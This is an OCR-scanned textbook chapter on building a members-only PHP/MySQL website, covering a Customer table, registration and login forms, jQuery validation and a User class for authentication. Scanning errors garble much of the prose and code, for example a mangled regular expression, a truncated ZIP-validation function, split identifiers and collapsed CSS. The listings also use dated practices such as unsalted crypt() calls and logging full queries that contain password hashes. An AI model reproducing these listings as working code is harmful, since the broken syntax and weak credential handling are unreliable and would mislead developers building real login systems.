Building login page functionality 

Authenticating users 

Using PHP’s mail function 


JWJm any websites are secret — restricted to only authorized users — or 
y r i have secret sections. Such websites require users to log in before 
they can see the secret information. Here are some examples of situations in 
which websites might restrict access: 


♦ E-commerce administration: Many online merchants require customers 
to log in so that their information can be stored for future transactions. 
The customer information, particularly financial information, needs to 
be protected from public view. 

♦ Confidentiality: Many websites need to restrict information to certain 
people. For instance, company information might be restricted to 
company staff or members of a certain department. 

♦ Paid access: Some websites provide access to information that’s available 
for sale, so the information needs to be restricted to people who have 
paid for it. 


User login is one of the most common applications on the web, with many 
uses. We’re sure you’ve seen and logged in to many login applications. 


If you need to build a complex login application, this chapter is for you. Here, 
we tell you about some important features of these types of applications and 
then walk you through creating all the required elements: the user database, 
web forms to collect the information and log users in, and all the backend 
details that allow this type of application to run smoothly. 
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Understanding a Menthers-Onty Site 

User login applications can be quite simple, such as an application in which 
the administrator sets up a list of valid users. Anyone who tries to access 
a protected file is prompted to enter a username and password, which is 
checked against the list of valid users. On the other hand, a login application 
can be much more complicated. It can allow the website visitor to register 
for access, setting up his or her own account. The application might collect 
information from the customers as they register. The application might pro¬ 
vide the capability for the users to manage their own accounts. The features 
that a login application can provide are varied. 

The basic function of the login application in this chapter is to allow regis¬ 
tered users to enter the website and to keep out users who haven’t regis¬ 
tered. Its second major function is to allow users to register, storing their 
information in a database. To meet its basic functionality, the user login 
application should do the following: 

♦ Give customers a choice of whether to register for wehsite access or to 
iog in to the wehsite if they’re already registered. 

♦ Display a registration form that allows new customers to type their 
registration information. The information to be collected in the form is 
discussed in the following section, “Creating the User Database.” 

♦ Validate the information submitted in the form. Make sure the required 
fields are not blank and the submitted information is in the correct 
format. 

♦ Store the validated information in the database. 

4 - Display a login form that asks for the registered customer’s username 
and password. 

♦ Compare the username and password that’s entered with the user- 
names and passwords in the database. If a match is found, send a web 
page from the site to the customer. If no match is found, give the cus¬ 
tomer the opportunity to try another login. 

Aside from the capability to register and log in, a login application can get 
much more complex, giving the capability for an administrator to assign 
roles to certain accounts. For example, a user might be an administrator 
who can view and change details of other user accounts. Although that 
functionality is beyond the scope of this chapter, it’s another function for an 
authentication system. 


Creating the User (database 589 


Creating the User Database 

The application design calls for a database that stores user information. The 
database is the core of this application. The database is needed to store the 
usernames and passwords of all users allowed to access the website. Often, 
the database is used to store much more information about the customer. 
This information can be used for marketing purposes. 

The login application in this chapter assumes that the users are customers 
who are willing to provide their names, addresses, and other information. 
This type of application is most appropriate for sites that sell products to 
customers. The user database is named Customer. 

desi^nin^ the Customer database 

Your first design task is to select the information you want to store in the 
Customer database. At the very least, you need to store a username and a 
password that the user can use to log in. It’s also useful to know when the 
user account was created. In deciding which information to collect during 
the user registration, you need to balance your urge to collect all the poten¬ 
tially useful information that you can think of against your users’ urges to 
avoid forms that look too time-consuming and their reluctance to give out 
personal information. One compromise is to ask for some optional information. 
Users who don’t mind will enter it, and those who object can just leave it 
blank. You saw examples of this in Chapter 3 of this minibook, where only 
certain fields were required on the form. 

Some information is required for your website to perform its function. For 
Instance, users can readily see that a site that’s going to send them something 
needs to collect a name and address. However, they might not see why 
you need a phone number. Even if you require it, users sometimes enter 
fake phone numbers. So, unless you have a captive audience, such as your 
employees, who must give you everything you ask for, think carefully about 
what information to collect. It’s easy for users to leave your website when 
irritated. It’s not like they drove miles to your store and looked for a parking 
space for hours. They can leave with just a click. 

For the sample application in this chapter, assume the website is an online 
store that sells products. Thus, you need to collect the customer’s contact 
information, you believe you need her phone number in case you need to 
contact her about her order. Most customers are willing to provide phone 
numbers to reputable online retailers, recognizing that orders can have 
problems that need to be discussed. The remainder of this section discusses 
the details of the information and its storage in a MySQL database. 

The database contains only one table. The customer information is stored 
in the table, one record (row) for each customer. The fields needed for the 
table are shown in Table 4-1. 
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Table 4-1 

Database Table: Customer 

Variable Name 

Tifpe 

Description 

id 

INT 

Auto-incrementing primary key 

email 

VARCHAR(255) 

E-mail address for the account. This 
will also be used as the username 
for login of the user account. 

create_date 

DATE 

Date when account was added to 
table 

password 

VARCHAR(255) 

Password forthe account 

last name 

VARCHAR(255) 

Customer's last name 

first name 

VARCHAR(255) 

Customer's first name 

street 

VARCHAR(255) 

Customer's street address 

city 

VARCHAR(255) 

City where customer lives 

state 

CHAR(2) 

Two-letter state code 

zip 

CHAR(10) 

ZIP code; 5 numbers or ZIP + 4 

phone 

VARCHAR(25) 

Phone number where customer can 
be reached 

phone type 

VARCHAR(255) 

Phone type (work or home) 


The table has 12 fields. The first four fields, id, email, password, and 
create_date, are required and cannot be blank. The remaining fields con¬ 
tain information like the customer’s name, address, and phone, which are 
allowed to be blank. The first field, id, is the primary key. 


Buitdin^ the Customer database 

You can create the MySQL database using any of the methods discussed in 
Book V, Chapter 3. The following SQL statement creates this database: 

CREATE DATABASE CustomerDirectory; 


The following SQL statement creates the table: 


CREATE TABLE Customer ( 

id INT NOT NULL PRIMARY KEY AUTO_INCREMENT, 
email VARCHAR(255) NOT NULL, 

create_date DATETIME NOT NULL, 

password VARCHAR(255) NOT NULL, 

last_name VARCHAR(255), 

firs t_name VARCHAR(255), 

street VARCHAR(255), 

city VARCHAR(255), 

state CHAR(2), 
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zip CHAR(10), 

phone VARCHAR(25), 

phone_tYpe VARCHAR(255) 


Accessing the Customer database 

PHP provides MySQL functions for accessing your database from your PHP 
script. The MySQL functions are passed the information needed to access 
the database, such as a MySQL account name and password. The MySQL 
account name and password are not related to any other account name or 
password that you have, such as a password to log in to the system. 

In this application, the information needed by the PHP mysqli functions is 
stored in a separate file called dbstuf f. inc. This file is stored in a directory 
outside the web space, for security reasons. The file contains information 
similar to the following: 

<?php 

de fine("DBHOST”, "YOURHOST”) ; 

define("DBUSER”, "YOURUSER”); 
define("DBPASS”, "YOURPASSWORD”); 
define!"DB","CustomerDirectory"); 


?> 



Notice the PHP tags at the beginning and the end of the file. If these tags are 
not included, the information might display on the web page for the whole 
world to see. Not what you want at all. 

For security reasons, this file is stored in a directory outside the web space. 
You can set the include directory in your php. ini file. Include files are 
explained in detail in Book IV, Chapter 2. 



This database is intended to hold data entered by customers — not by you. 
It will be empty when the application is first made available to customers 
until customers add data. 

When you test your application scripts, the scripts will add a row to the 
database. You need to add a row with a username and password for your 
own use when testing the scripts. 


Creating Base Functions 

The first step in creating any large application is to create some base files 
that will be used to house generic functions. In Chapter 3 of this minibook, 
a file for validation is created. For this application, use that validation file 
along with a main functions file that will then require other files. 
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This represents an important conceptual change from the forms used in 
Chapter 3. The functions file will be responsible for starting sessions, setting 
up any constants that you might need, and including other required files. 
This saves you from having to remember what to include where and from 
having to remember to start sessions everywhere. 

Your basic functions file will be called functions . inc and will be placed in 
the document root. Listing 4-1 shows that file. 


Listing 4-1: A Basic Functions File 

<?php 

//generic file for generic functions and other includes 
session_start(); 

require_once("../dbstuff.inc”); 
require_once("validation.inc”); 

?> 

As you can see from Listing 4-1, the session is started and two files are 
required: the dbstuf f. inc file that you saw in the preceding section and a 
validation, inc file, shown in Listing 4-2. 


Listing 4-2: The validation.inc File 

<?php 

function is_valid_state($state) { 

$validStates = array!"AL","CA”,"CO”,"FL”,”IL","NJ”,”N 
Y","WI"); 

if (in_arraY($state,$validStates)) { 
return true; 

} else { 

return false; 

} 

} //end function is_valid_state 


function is_valid_zip($zip) { 

if (preg_match( ' Z''[\d]+$/' , $zip) ) { 

return true; 

} else if (strlen($zip) == 5 || strlen($zip) 
return true; 

} else { 

return false; 


} 

} //end function is_valid_zip 


9 ) { 


?> 
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This validation, inc file is similar to that used from Chapter 3. The main 
change is to the array of valid states. 

As you move through this chapter, other files will be added to the functions. 
inc file and other functions may be added as you need them. 
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Creating the registration pa^es 

The registration page borrows heavily from the form in Chapter 3. There are 
a couple additional fields, based on the data requirements for this application, 
and there’s a require_once at the top of the file to include your generic 
functions file. 

Listing 4-3 shows the code for the registration page, called register .php. 


The pages involved in the application will use jQuery, along with an external 
JavaScript and Cascading Style Sheet (CSS) file. This is essentially the same 
pattern used in Chapter 3, and as you’ll see, the registration form looks strik¬ 
ingly similar to that used in that chapter, too! 


Listing 4-3: The Registration Page 

<?php require_once("functions.inc"); ?> 

<!doctYpe html> 

<html> 

<head> 

<script tYpe="text/javascript" src="https://ajax.googleapis. 

com/ajax/libs/jquery/1.8.3/jquery.min.j s"></script> 
<script type="text/javascript" src="register.js"></script> 
<link rel="stylesheet" type="text/css" href="form.css"> 
<title>A form</title> 

</head> 

<body> 

<form id="userForm" method="POST" action="register-process. 

php" > 

<div> 

<fieldset> 

<legend>Registration Information</legend> 

<div id="errorDiv"> 

<?php 

if (isset($_SESSION['error']) && isset($_ 

SESSION['formAttempt'])) { 

unset($_SESSION['formAttempt']); 
print "Errors encountered<br />\n"; 
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Listing 4-3 (continued) 

foreach ($_SESSION['error'] as $error) { 

print $error . "<br />\n"; 

} //end foreach 
} //end if 

?> 

</div> 

<label for="fname">First Name:* </label> 

<input tYpe="text" id="fname" name="fname"> 

<span class="errorFeedback errorSpan" 
id="fnameFrror">First Name is reguired</span> 

<br /> 

<label for="Iname">Last Name:* </label> 

<input tYpe="text" id="Iname" name="Iname"> 

<span class="errorFeedback errorSpan" 
id="InameFrror">Last Name is required</span> 

<br /> 

<label for="email">F-mail Address:* </label> 
<input tYpe="text" id="email" name="email"> 

<span class="errorFeedback errorSpan" 
id="emailFrror">F-mail is required</span> 

<br /> 

<label for="passwordl">Password:* </label> 

<input tYpe="password" id="passwordl" 
name="passwordl"> 

<span class="errorFeedback errorSpan" 
id="passwordlFrror">Password required</span> 

<br /> 

<label for="password2">Verify Password:* </label> 
<input tYpe="password" id="password2" 
name="password2"> 

<span class="errorFeedback errorSpan" 
id="password2Frror">Passwords don't match</span> 

<br /> 

<label for="addr">Address: </label> 

<input tYpe="text" id="addr" name="addr"> 

<br /> 

<label for="citY">CitY: </label> 

<input tYPe="text" id="citY" name="citY"> 

<br /> 

<label for="state">State: </label> 

<select name="state" id="state"> 

<option></option> 

<option value="AL">Alabama</option> 

<option value="CA">California</option> 

<option value="CO">Colorado</option> 

<option value="FL">Florida</option> 

<option value="IL">Illinois</option> 

<option value="NJ">New JerseY</option> 

<option value="NY">New York</option> 
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<option value=''WI ">Wisconsin</option> 

</select> 

<br /> 

<label for="zip">ZIP: </label> 

<input tYpe="text" id="zip" name="zip''> 

<br /> 

<label for="phone">Phone Number: </label> 

<input tYpe="text" id="phone” name= "phone"> 

<span class="errorFeedback errorSpan" 
id="phoneError">Format: xxx-xxx-xxxx</span> 

<br /> 

<br /> 

<label for="work">Number Type:</label> 

<input class="radioButton" tYpe="radio" 
name="phonetype" id="work" value="work"> 

<label class="radioButton" for="work">Work</label> 
<input class="radioButton" type="radio" 
name="phonetype" id="home" value="home"> 

<label class="radioButton" for="home">Home</label> 
<span class="errorFeedback errorSpan phoneTypeError 
id="phonetypeError">Please choose an option</span> 

<br /> 

<input type="submit" id="submit" name="submit"> 
</fieldset> 

</div> 

</form> 

</body> 

</html> 

When viewed in a browser, the page looks like that in Figure 4-1. 


Figure 4-1: 

The 

registration 
page layout 


jS httpi//tt/fd/b6c4/register.php^^P^*^^S^OJ^| jg Aform 

Registration Information 
First Name * 

Last Name * 

E-mail Address;* 

Password:* 

Verify Password:* 

Address: 

City: 

State: 

ZIP: 

Phone Number: 


□ZL 


Number Type: c Work O Home 




Submit Qiiftrv I 
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The registration page uses nearly the same JavaScript and CSS as Chapter 3’s 
form, too. The registration page’s HTML refers to them as register. j s and 
form, css, respectively. Listing 4-4 shows the JavaScript used for the regis¬ 
tration page. 


Listing 4-4: Registration JavaScript 

$(document).ready(function() { 

$("#userForm").submit(function(e) { 

removeFeedback(); 
var errors = validateForm(); 
if (errors == ”") { 
return true; 

} else { 

provideFeedback(errors); 
e.preventDefault(); 
return false; 

} 

}) ; 


function validateForm() { 

var errorFields = new Array(); 

//Check required fields have something in them 

if ($('#lname').val() == "") { 
errorFields.push('Iname'); 

} 

if ($('#fname').val() == "") { 
errorFields.push('fname'); 

} 

if ($('#email').val() == "") { 
errorFields.push('email'); 

} 

if ($('#passwordl').val() == "") { 
errorFields.push('passwordl'); 

} 

// Check passwords match 

if ($('#password2').val() != $('#passwordl').val()) { 

errorFields.push('password2'); 

} 

//very basic e-mail check, just an @ symbol 

if (!($('#email').val().indexOf(".") > 2) && 

($('#email').val().indexOf("@"))) { 
errorFields.push('email'); 

} 

if ($('#phone').val() != "") { 

var phoneNum = $('#phone').val(); 
phoneNum.replace(/[^0-9]/g, ""); 
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if (phoneNum.length != 10) { 

errorFields.push("phone"); 

} 

if (!$('input[name=phonetYPe]:checked').val()) { 

errorFields.push("phonetype"); 

} 

} 

return errorFields; 

} //end function validateForm 

function provideFeedback(incomingErrors) { 

for (var i = 0; i < incomingErrors.length; i++) { 

$("#" + incomingErrors[i]).addClass("errorClass"); 
$("#" + incomingErrors[i] + "Error"). 
removeClass("errorFeedback"); 

} 

$("#errorDiv").html("Errors encountered"); 

} 

function removeFeedback() { 

$("#errorDiv").html(""); 

$('input').each(function() { 

$(this).removeClass("errorClass"); 

}) ; 

$('.errorSpan').each(function() { 

$(this).addClass("errorFeedback"); 

}) ; 

} 


}) ; 

Listing 4-5 shows the CSS used for the registration page. 


Listing 4-5: Registration Page CSS 


body 

} 


font-family: arial,helvetica; 


form 

} 


fieldset { 
display: 


inline-block; 


.radioButton { 

float: none; 
display: inline; 
margin-right: O.lem; 
width: 2em; 

} 


(continued) 
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Listing 4-5 (continued) 

form label { 

width: 8em; 
margin-right: lem; 
float: left; 
text-align: right; 
display: block; 

} 

form input { 

width: 15em; 

} 

#submit { 

margin-top: 2em; 
float: right; 

} 

.errorClass { 

background-color: #CC6666; 

} 

#errorDiv { 

color: red; 

} 

.errorFeedback { 

visibility: hidden; 

} 

.phoneTypeError { 

margin-left: 1.2em; 
padding: 0.lem; 
background-color: #CC6666; 

} 

Much of the work for a members-only site happens through objects, which 
you learn about in Book IV, Chapter 4. Later in this chapter, you create a 
user object. One area that doesn’t really call for the power and reusability 
of object-oriented code is in the registration. For example, you won’t need 
to call the registration function from multiple places and the functions used 
within it are very specific to registration. All these factors add up to being 
able to use a simple function for registration. 

The registration-process PHP page, which is called as the form action from the 
register. php page (refer to Listing 4-3), includes much of the same error 
handling that you see in Chapter 3’s example. In addition, the registration 
function is also included on the page. Listing 4-6 shows the register- 
process .php page. 
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Listing 4-6: The register-process Page 

<?php 

require_once('functions.inc ' ) ; 

//prevent access if they haven't submitted the form, 
if (!isset($_POST['submit'])) { 

die(header("Location: register.php")); 

} 

$_SESSION['formAttempt'] = true; 

if (isset($_SESSION['error'])) { 

unset($_SESSION['error']); 

} 

$_SESSION['error'] = array(); 

$required = array("Iname","fname","email","passwordl","passw 
ord2"); 

//Check required fields 

foreach ($required as $requiredField) { 

if (!isset($_POST[$requiredField]) || $_POST[$requiredField] 

== "") { 

$_SESSION['error'][ ] = $requiredField . " is 

required."; 

} 

} 

if (!preg_match('/^[\w .]+$/',$_POST['fname'])) { 

$_SESSION['error'][] = "First Name must be letters and 
numbers only."; 

} 

if (!preg_match('/^[\w .]+$/',$_POST['Iname'])) { 

$_SESSI0N['error'][] = "Last Name must be letters and 
numbers only."; 

} 


if (isset($_POST['state']) && $_POST['state'] != "") { 

if (!is_valid_state($_POST['state'])) { 

$_SESSI0N['error'][] = "Please choose a valid state"; 

} 

} 

if (isset($_POST['zip']) && $_POST['zip'] != "") { 

if (!is_valid_zip($_POST['zip'])) { 

$_SESSION['error'][] = "ZIP code error."; 

} 

} 

if (isset($_POST['phone']) && $_POST['phone'] != "") { 

if (!preg_match('/^[\d]+$/',$_POST['phone'])) { 
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Listing 4-6 (continued) 

$_SESSION['error'][] = "Phone number should be digits 
only"; 

} else if (strlen($_POST['phone']) < 10) { 

$_SESSION['error'][] = "Phone number must be at least 
10 digits"; 

} 

if (!isset($_POST['phonetype']) || $_POST['phonetype'] == 

"") { 

$_SESSION['error'][] = "Please choose a phone number 
type"; 

} else { 

$validPhoneTypes = array("work","home"); 

if (!in_array($_POST['phonetype'],$validPhoneTypes)) 

{ 

$_SESSI0N['error'][] = "Please choose a valid 
phone number type."; 

} 

} 

} 

if (!filter_var($_POST['email'],FILTER_VALIDATE_EMAIL)) { 

$_SESSION['error'][] = "Invalid e-mail address"; 

} 

if ($_POST['passwordl'] != $_POST['password2']) { 

$_SESSION['error'][] = "Passwords don't match"; 

} 

//final disposition 

if (count($_SESSION['error']) >0) { 

die(header("Location: register.php")); 

} else { 

if(registerUser($_POST)) { 

unset($_SESSION['formAttempt']); 
die(header("Location: success.php")); 

} else { 

error_log("Problem registering user: {$_POST['email']}"); 

$_SESSION['error'][] = "Problem registering account"; 
die(header("Location: register.php")); 

} 

} 

function registerUser($userData) { 

$mysqli = new mysqli(DBHOST,DBUSER,DBPASS,DB); 
if ($mysqli->connect_errno) { 

error_log("Cannot connect to MySQL: " . $mysqli->connect_error); 
return false; 

} 

$email = $mysqli->real_escape_string($_POST['email']); 
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//check for an existing user 

$findUser = "SELECT id from Customer where email = 

'{$email}'"; 

$findResult = $mysqli->querY($findUser); 

$findRow = $findResult->fetch_assoc(); 
if (isset($findRow['id']) && $findRow['id'] != "") { 

$_SESSION['error'][] = "A user with that e-mail 
address already exists"; 
return false; 

} 


$lastName = $mysqli->real_escape_string($_POST['Iname']); 
$firstName = $mysqli->real_escape_string($_ 

POST['fname']); 

$cryptedPassword = crypt($_POST['passwordl']); 

$password = $mysqli->real_escape_ 
string($cryptedPassword); 

if (isset($_POST['addr'])) { 

$street = $mysqli->real_escape_string($_ 

POST['addr']); 

} else { 

$street = 

} 

if (isset($_POST['city'])) { 

$city = $mysqli->real_escape_string($_POST['city']); 

} else { 

$city = ""; 

} 

if (isset($_POST['state'])) { 

$state = $mysqli->real_escape_string($_ 

POST['state']); 

} else { 

$state = 

} 

if (isset($_POST['zip'])) { 

$zip = $mysqli->real_escape_string($_POST['zip']); 

} else { 

$zip = ""; 

} 

if (isset($_POST['phone'])) { 

$phone = $mysqli->real_escape_string($_ 

POST['phone']); 

} else { 

$phone = ""; 

} 

if (isset($_POST['phonetype'])) { 

$phoneType = $mysqli->real_escape_string($_ 

POST['phonetype']) ; 

} else { 


Book VI 
Chapter 4 


(continued) 


Building a 
Members-Only 
Website 




602 


Creating Web Forms 


Listing 4-6 (continued) 

$phoneTYpe = ""; 

} 

$querY = "INSERT INTO Customer (email,create_ 
date,password,last_name,first_name,street,city,state,zip,p 
hone,phone_tYpe) " . 

” VALUES ('{$email}',NOW(),'{$password}','{$lastName} 

','{$firstName}'" . 

",'{$street}','{$city}','{$state}','{$zip}','{$phone} 

','{$phoneType}')"; 
if ($mysqli->query($query)) { 

$id = $mysqli->insert_id; 

error_log("Inserted {$email} as ID {$id}"); 

return true; 

} else { 

error_log("Problem inserting {$query}"); 

return false; 


} //end function registerUser 


The registerUser function is called if no other errors are encountered. 
Therefore, by the time you get to the registerUser function, you already 
know that there’s a valid e-mail address, that the passwords match, and the 
required fields are all filled in. This means that the registerUser function 
can concentrate on its job: Get the user information entered into the database. 



The registerUser function first connects to the MySQL database by using 
the constants defined in the dbstuf f . inc file. Assuming the connection is 
there, the e-mail address is escaped to make it safe to use in an SQL state¬ 
ment. The e-mail address is then used to check if a user already exists with 
that e-mail address. If one is found, then an error is set and Boolean false is 
returned, which will trigger the error display. 

The MySQL table is named Customer, with an uppercase C. If you attempt to 
access it with a lowercase c, as in customer, the query will fall. 

Assuming that an existing user isn’t found, each of the values to be inserted 
into the database is then escaped using the mysqli_real_escape_string () 
PHP function. The password is also encrypted using the built-in PHP crypt () 
function as well. 


An INSERT statement is built and executed against the database. If the state¬ 
ment executes correctly, then the ID is retrieved; otherwise, an error is 
generated. 
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BuiUin0 a success pa^e 

If registration is successful, the user is redirected to success .php. In the 
example, success .php is going to be a really simple page, but you can 
make the page as complex as you’d like. 

Listing 4-7 shows the code for the success page. 


Listing 4-7: The Success Page 

<!doctYpe html> 

<html> 

<head> 

<title>Registration Success</title> 

</head> 

<body> 

<div> 

Thank you for registering 

</div> 

<div> 

<a href="login.php">Click here to login</a> 

</div> 

</body> 

</html> 

Now run through a registration using the code built so far. This procedure 
assumes that you’ve created the CustomerDirectory database and 
Customer table. 

Figure 4-2 shows the registration page with all the fields filled in correctly. 


^ http://tt/fd/bl5c4/rtgiittr,php P S 0 X [ 0 Registrstion 





Registration Information 


First Name * 

Steve 


Last Name:* 

Suehring 


E-mail Address:* 

suehring@braingia com 


Password:* 

• •• 


Verify Password:* 

• •• 


Address: 

1600 W. Addison 


City: 

Chicago 


State: 


Figure 4-2: 

ZIP: 

60610 

Phone Number; 

3125S51212 

Filling 
out the 

Number Type: 

® Work © Home 

registration 


d 


page. 


Submit Query 


Book VI 
Chapter 4 


Building a 
Members-Only 
Website 





























60 i Creating Web Forms 


Once filled in, clicking Submit Query sends the form to the register- 
process .php page, which then registers the user and redirects to the 
success page shown in Figure 4-3. 


Figure 4-3: 

The success 
page. 




http://tt/fd/b6c4/succ( 


Thank you for registering 
Click here to login 





r^i B I I sT ] 


At this point, there’s a database row created with the information from the 
registration form and the user is ready to log in. If only you had a login page! 

Creating the to^in pa^e 

Now that you have the capability to register a user, it’s time to create a page 
related to logging in to the application. The login page will look like Figure 4-4. 


Mtp'//tW/b6c4/login.php P • S 0 X || g Logm x[ |'6 ® 

Login 

E-mail Address * _ 

Password:* 


I Submit Quw^ 


Figure 4-4: 

The login 
page. 
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Listing 4-8 shows the code to build the login page. 


Listing 4-8: The Code for the Login Page 

<?php require_once("functions.inc") ; ?> 

<!doctYpe html> 

<html> 

<head> 

<script tYpe="text/javascript" src="https://ajax.googleapis. 

com/ajax/libs/jquery/l.8.3/jquery.min.js"></script> 
<script type="text/javascript" src="login.js"></script> 

<link rel="stylesheet" type="text/css" href="form.css"> 
<title>Login</title> 

</head> 

<body> 

<form id="loginForm" method="POST" action="login-process. 

php" > 

<div> 

<fieldset> 

<legend>Login</legend> 

<div id="errorDiv"> 

<?php 

if (isset($_SESSION['error']) && isset($_ 

SESSION['formAttempt'])) { 

unset($_SESSION['formAttempt']); 
print "Errors encountered<br />\n"; 
foreach ($_SESSION['error'] as $error) { 
print $error . "<br />\n"; 

} //end foreach 

} //end if 

?> 

</div> 

<label for="email">E-mail Address:* </label> 

<input type="text" id="email" name="email"> 

<span class="errorFeedback errorSpan" 
id="emailError">E-mail is required</span> 

<br /> 

<label for="password">Password:* </label> 

<input type="password" id="password" name="password"> 
<span class="errorFeedback errorSpan" 
id="passwordError">Password required</span> 

<br /> 

<input type="submit" id="submit" name="submit"> 
</fieldset> 

</div> 

</form> 

</body> 

</html> 
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This code uses a JavaScript file called form. j s, which is shown in Listing 4-9. 


Listing 4-9: JavaScript for the Login Page 

$(document).ready(function() { 

$("#loginForm").submit(function(e) { 

removeFeedback(); 
var errors = validateForm(); 
if (errors == " ") { 
return true; 

} else { 

provideFeedback(errors); 
e.preventDefault(); 
return false; 

} 

}) ; 

function validateForm() { 

var errorFields = new Array(); 

//Check required fields have something in them 
if ($('#email').val() == "") { 
errorFields.push('email'); 

} 

if ($('#password').val() == "") { 
errorFields.push('password'); 

} 

//very basic e-mail check, just an @ symbol 
if (!($('#email').val().indexOf(".") > 2) && 

($('#email').val().indexOf("@"))) { 
errorFields.push('email'); 

} 

return errorFields; 

} //end function validateForm 

function provideFeedback(incomingErrors) { 

for (var 1=0; i < incomingErrors.length; i++) { 

$("#" + incomingErrors[i]).addClass("errorClass"); 
$("#" + incomingErrors[i] + "Error"). 
removeClass("errorFeedback"); 

} 

$("#errorDiv").html("Errors encountered"); 

} 

function removeFeedback() { 

$("#errorDiv").html(""); 

$('input').each(function() { 

$(this).removeClass("errorClass"); 

}) ; 
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$('.errorSpan').each(function() { 

$(this).addClass("errorFeedback"); 

}) ; 


}) ; 

The CSS used in this file is the same as is used for the registration page, 
form, css (refer to Listing 4-5). Therefore, you don’t need to create a new 
file for it. The action of the login form is login-process .php, which you 
build in the next section. 


Creating a User Object 

The basis for the authenticated portion of your customer’s site is the user — 
specifically, who they are and whether they’re logged in or not. To that end, 
a User object will provide a helpful abstraction layer, enabling you to add 
functionality later as you need it. 

BuiUin^ the User ctass 

The User class (it’s common to start classes with an uppercase letter in 
PHP) will be stored in a file called ClassUser .php. That file will be included 
in the functions. inc file with this line: 

require_once("ClassUser.php"); 

Now the User class will be available everywhere that uses the functions . 
inc file (which is pretty much everywhere in your application). 

The User class is used to authenticate users and to set their information 
to and from sessions so that it can be used across multiple pages of the 
application. Listing 4-10 shows the code for the User class. 


Listing 4-10: 

<?php 

class User 

public 

public 

public 

public 

public 

public 

public 


The Code for the User Class 


{ 


$id; 

$email; 

$firstName; 

$lastName; 

$address; 

$citY; 

$state; 
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Listing 4-10 (continued) 

public $zip; 

public $phone; 

public $phoneTYpe; 

public $isLoggedln = false; 

function _construct() { 

if (session_id() == "") { 
session_start(); 

} 

if (isset($_SESSI0N['isLoggedin']) && $_SESSI0N['isLoggedin'] 
== true) { 

$this->_initUser(); 

} 

} //end _construct 

public function authenticate($user,$pass) { 

$mysqli = new mysqli(DBHOST,DBUSER,DBPASS,DB); 
if ($mysqli->connect_errno) { 

error_log("Cannot connect to MySQL: " . 
$mysqli->connect_error); 

return false; 

} 

$safeUser = $mysqli->real_escape_string($user) ; 
$incomingPassword = $mysqli->real_escape_ 
string($pass); 

$query = "SELECT * from Customer WHERE email = 

'{$safeUser}'"; 

if (!$result = $mysqli->query($query)) { 

error_log("Cannot retrieve account for {$user}"); 
return false; 

} 

// Will be only one row, so no while() loop needed 
$row = $result->fetch_assoc(); 

$dbPassword = $row['password']; 

if (crypt($incomingPassword,$dbPassword) != 
$dbPassword) { 

error_log("Passwords for {$user} don't match"); 
return false; 

} 

$this->id = $row['id']; 

$this->email = $row['email']; 

$this->firstName = $row['first_name']; 

$this->lastName = $row['last_name']; 

$this->address = $row['street']; 

$this->city = $row['city']; 

$this->zip = $row['zip']; 

$this->state = $row['state']; 

$this->phone = $row['phone']; 
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$this->phoneTYpe = $row['phone_tYpe']; 

$this->isLoggedln = true; 

$this->_setSession(); 

return true; 

} //end function authenticate 

private function _setSession() { 

if (session_id() == '') { 
session start(); 

} Book VI 
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$_SESSION['id'] = $this->id; 

$_SESSION['email'] = $this->email; 

$_SESSION['firstName'] = $this->firstName; 

$_SESSI0N['lastName'] = $this->lastName; 

$_SESSI0N['address'] = $this->address; 

$_SESSION['city'] = $this->city; 

$_SESSION['zip'] = $this->zip; 

$_SESSI0N['state'] = $this->state; 

$_SESSION['phone'] = $this->phone; 

$_SESSION['phoneType'] = $this->phoneType; 

$_SESSI0N['isLoggedin'] = $this->isLoggedln; 

} //end function setSession 

private function _initUser() { 

if (session_id() == '') { 
session_start(); 

} 

$this->id = $_SESSION['id']; 

$this->email = $_SESSION['email']; 

$this->firstName = $_SESSION['firstName']; 

$this->lastName = $_SESSI0N['lastName']; 

$this->address = $_SESSI0N['address']; 

$this->city = $_SESSION['city']; 

$this->zip = $_SESSION['zip']; 

$this->state = $_SESSI0N['state']; 

$this->phone = $_SESSION['phone']; 

$this->phoneType = $_SESSION['phoneType']; 

$this->isLoggedln = $_SESSI0N['isLoggedin']; 

} //end function initUser 


} //end class User 
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The constructor for the User class first checks to see if the session is 
started (this will be a common theme for most of the functions in the class). 
Granted, the session should be started already but if it’s not, you definitely 
don’t want to be messing around with session-related variables. So if the ses¬ 
sion isn’t already there, start it. 

Next in the constructor, check to see if the user is logged in. If he is, run the 
inituser function. The inituser function grabs the user’s information 
from the session and sets each of the elements of their information as 
properties. 

The authenticate function is used to check the credentials entered on the 
form against what’s in the database. A database connection is created and a 
query is built using the e-mail address entered on the login form. If no user 
is found with that e-mail address, an error is logged behind the scenes and 
false is returned from the function. 

Assuming that a user is found, her password is retrieved from the database. 
The password will be encrypted, just as you entered it when the user regis¬ 
tered. Therefore, the code needs to call the crypt () function with both the 
incoming password from the login form and the password retrieved from the 
database. If both encrypted versions match, then you know the user is using 
the correct password. 

With the user successfully authenticated, set the various details from the 
database into properties and call the setSession () function. The setSes- 
sion () function takes the properties and sets them into the session so that 
they can be used on other pages of the application. 

That’s the user class, so far at least. You add to it as you need to later. 

BuiMin^ the to^in-process PHP fife 

Now that the User class is ready to go, you can build the login-process. 
php file. The login-process . php file is the login form’s action. When 
someone clicks the Submit Query button to log in, he will be sent to this file, 
which will do the business of authenticating him and sending him on to the 
appropriate place. 

The login-process code is shown in Listing 4-11. 


Listing 4-11: Code for the login-process File 

<?php 

require_once('functions.inc') ; 

//prevent access if they haven't submitted the form, 
if (!isset($_POST['submit'])) { 
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die(header("Location: login.php")); 

} 

$_SESSION['formAttempt'] = true; 

if (isset($_SESSION['error'])) { 

unset($_SESSION['error']); 

} 

$_SESSION['error'] = array(); 

$required = array("email","password"); 

//Check required fields 

foreach ($required as $requiredField) { 

if (!isset($_POST[$requiredField]) || $_POST[$requiredField] 

$_SESSION['error'][] = $requiredField . " is 

required."; 

} 

} 

if (!filter_var($_POST['email'],FILTER_VALIDATE_EMAIL)) { 

$_SESSION['error'][] = "Invalid e-mail address"; 

} 

if (count($_SESSION['error']) >0) { 

die(header("Location: login.php")); 

} else { 

$user = new User; 

if ($user->authenticate($_POST['email'],$_POST['password'])) 

{ 

unset($_SESSION['formAttempt']); 

die(header("Location: authenticated.php")); 

} else { 

$_SESSION['error'][] = "There was a problem 
with your username or password."; 

die(header("Location: login.php")); 

} 

} 

?> 

The code from the login-process file shares much of the same logic from 
the register-process file earlier in the chapter. That initial logic is ana¬ 
lyzed in Chapter 3. 

New for the login-process is the instantiation of the User class and the use 
of the User class for authentication. The authenticate () function in the 
User class returns true if the user was authenticated; therefore, it can be 
